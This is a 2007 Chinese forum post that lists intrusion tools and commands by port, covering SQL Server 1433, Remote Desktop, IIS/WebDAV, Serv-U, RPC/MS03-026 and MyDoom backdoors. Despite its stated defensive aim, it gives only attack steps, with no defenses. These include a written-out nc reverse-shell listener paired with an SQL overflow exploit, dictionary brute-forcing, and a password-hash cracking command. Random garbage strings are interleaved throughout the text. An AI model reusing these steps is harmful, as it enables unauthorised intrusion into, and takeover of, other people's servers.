 该用户从未签到
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
* Y7 U' H+ @3 [. j+ Y9 z " D# Q8 L9 P# M3 f$ T
" n! [$ V% Q' m( L
1. 1433端口入侵
' G9 a# ~4 x1 I
4 T( L8 a1 J; X1 h6 d8 N4 ] scanport.exe 查有1433的机器 3 s f! h& N! S
s0 _5 T7 g3 ^! d( y2 K
SQLScanPass.exe 进行字典暴破(字典是关键)
) @8 N8 J* X$ \5 o
8 ^" ~( z% q. I" u, t 最后 SQLTools.exe入侵
% |* i6 e3 W# r2 {' Y& x% ^
) H% D8 n5 P& D0 l" H6 m =============================
8 |) c. n+ L3 Q) E }) u9 I9 d, x; g O- L; V. q! M% f- ^# i! A
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 * S, s# K4 _2 o$ h- J' W& f5 D
; `4 x7 D/ A4 n6 u- b. a( H+ L nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 " C, A3 V5 j" c$ e8 Y- M9 R
# L: ^; m+ B* S# F% w7 [ (以上反向的,测试成功)
) O3 M% Q7 ?2 s+ Z7 o4 h( C" s7 J& R3 z s
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
# L2 ?9 k9 d7 \! j & G a# o, ]0 ^% m. E9 J- s
2. 4899端口入侵
. B& t" x' I( r8 y) D: s' x# D- R
用4899过滤器.exe,扫描空口令的机器
9 X/ @( a% }7 B W- u# T3 {7 i
% H$ _* ]' s" u- o2 x" ^# g& U 3. 3899的入侵 $ ~1 g* o" Q. v: `" ?/ P
5 c9 \7 Q$ f+ ?6 H. W, y ?
对很早的机器,可以试试3389的溢出(win3389ex.exe) $ e/ p( k* |4 b0 _3 K0 J6 m: D. H
. U* J1 P) l; h" b+ Q
对2000的机器,可以试试字典暴破。(tscrack.exe) ' B! f0 |* t, P# t
# ?0 ~* R5 H6 e: ~ T 4. 80入侵
3 F" f% }3 G, F2 O: V; u
$ K- P! L* s2 D: l9 {, A& g. I 对sp3以前的机器,可以用webdav入侵;
' g( i4 o" @3 U5 Q f& F, _3 I) ?3 i1 }! _: W" R# N
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
/ z; }5 s9 f! r/ _- [# h
5 M5 d s e3 z* ~3 X6 l* j 可以利用SQL进行注入。(小榕的注入软件)。
' p3 A; L" I' [! {/ o) Z8 t& r" O
. i2 H3 t* q0 p' d# B8 p 5. serv-u入侵(21端口) $ ^+ s; U8 T' M3 t: b' k
4 m. t" e2 _/ r( _6 ^
对5. 004及以下系统,可用溢出入侵。(serv5004.exe) - \6 Z* @) Q' _* E
4 {/ C1 ^" Q" D% m3 j) h* { 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
& g) U! c3 f- D2 j8 J4 L& p( E6 u2 J
======================================
* z; h n; y m: c( p* G0 g4 G; F. a, C, r* v$ v3 } n
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
# t& Q! Y9 ?, j0 P& W M+ X8 M9 Y
: V ]( q+ }8 f. A 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
7 g! g- v" g; ]4 x, J% ]2 z, _ # x' O2 o) G$ G( H* d
6. 554端口 , q/ e5 l L& o7 z
) q- j5 V2 m- i- c8 c% x 用real554.exe入侵。
, m" f) S1 N& L. e( L
6 {3 I9 T, g* K1 [) h" a 7. 6129端口 0 X0 _5 c" d4 `! f9 h
& o+ W, g% v) ~6 S
用DameWare6129.exe入侵。
: n3 } Z! y. s" q# m
+ _3 Y9 s8 s% Y h% Q 8. 系统漏洞
/ t3 m; s3 Z( ~% E& c2 h- m, X% o7 _" w X
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
: h3 W K. W# x' @5 H3 }5 M! o2 V
- h$ p. a7 E) `/ k 进行溢出入侵。 " C7 z- Q5 c. A _ ^* n
i$ w6 ~, \5 R+ H9 W 9. 3127等端口
+ f d) [$ _* Y1 N2 n8 c5 N/ @4 \6 v4 c0 k- [9 ]
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 ' X4 X- [" s0 R. N0 u
% K* \1 ?2 P% w0 i/ `# b 10. 其他入侵
& |. Y- [8 s( F" D% Q8 N) h9 W# h+ A% l5 t# N
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
/ Q! x! w% e, A& g! \" z$ Y# l9 m) Q+ u( R* Q5 V4 s% ?6 s% q
| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
转发到微博
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
